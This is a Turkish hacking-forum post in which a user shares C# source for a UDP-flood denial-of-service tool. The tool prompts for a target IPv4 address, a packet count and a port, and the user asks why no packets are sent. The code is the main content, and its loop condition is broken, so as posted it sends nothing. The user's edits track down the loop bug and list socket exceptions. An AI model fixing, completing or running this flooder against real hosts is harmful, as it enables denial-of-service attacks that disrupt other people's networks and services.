Yazılım | Programlama C# - DOS çalışmıyor

D3DS1R

Yeni üye
23 Mar 2018
28
0
Uzun yazmandır buraya bakmadım yani hata yaparsam beni affedin.

C#'da yazdığım DOS komutu çalışmıyor. Ne kadar büyük numara girsemde işlem aşırı hızlı ve Wireshark bana gelen-giden paketin olamdığını gösteriyor. Elime ss yok ama gerekirse ekleyebilirim.

KODLAR:

Kod:
public static **** DDOSat(string IP, ulong paketSayisi, int port)
        {
            byte[] paket = Encoding.ASCII.GetBytes("paket mesajı silindi çükü banlardan korkuyorum");
            IPEndPoint ipendpoint = new IPEndPoint(IPAddress.Parse(IP), port);
            Socket client = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);

for(ulong i = 0; i == paketSayisi; i++)
            {
                client.SendTo(paket, ipendpoint);
            }
        }

Kod:
case "dos":
                        SCIO.WriteLine("Dikkat! Bu işlemin yasadışı amaçlarla kullanılmasından d3ds1r sorumlu değildir!", kirmizi);
                        SCIO.WriteLine("Bu saldırı DDOS değildir. DDOS gerçekleştirmek için bir Botnet'e ihtiyacınız var.", mavi);
                        SCIO.WriteLine("DOS atılacak bilgisayarın IPv4 adresini giriniz: ");
                        string ip = SCIO.ReadLine();
                        SCIO.WriteLine($"Gönderiliecek paket sayısını giriniz(0-{sizeof(ulong)}): ");
                        ulong pSayisi = Convert.ToUInt64(SCIO.ReadLine());
                        SCIO.WriteLine("Port numarasını giriniz: ");
                        int port = Convert.ToInt32(SCIO.ReadLine());
                        Metotlar.DDOSat(ip, pSayisi, port);
                        break;

Not: SCIO kendi yaptığım konsol çıkışını özelleştiren bir sınıftır. Console sınıfıyla hemen hemen aynı işi görür.

ÖNEMLİ EDİT: Hata ayıklarken farkettim sıkıntı döngüye girmemesi. Socket tipleri doğru gözüküyor belki birşey eksik olabilir.

Kod:
IPEndPoint ipendpoint = new IPEndPoint(IPAddress.Parse(IP), port);
            Socket client = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);

long i = 0;
            while (i == paketSayisi)
            {
                client.SendTo(paket, ipendpoint);
                i++;
            }

ÖNEMLİ EDİT v2: Sorun çıkan yer client objesi yani Socket. Sorunlar:

+ DualMode 'client.DualMode', 'System.NotSupportedException' türünde bir özel durum oluşturdu bool {System.NotSupportedException}

+ LingerState 'client.LingerState', 'System.Net.Sockets.SocketException' türünde bir özel durum oluşturdu System.Net.Sockets.LingerOption {System.Net.Sockets.SocketException}

+ NoDelay 'client.NoDelay', 'System.Net.Sockets.SocketException' türünde bir özel durum oluşturdu bool {System.Net.Sockets.SocketException}

HEPSİNDE STATİK VE ORTAK OLAMYAN ÜYELER SORUN ÇIKARTIYOR!

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.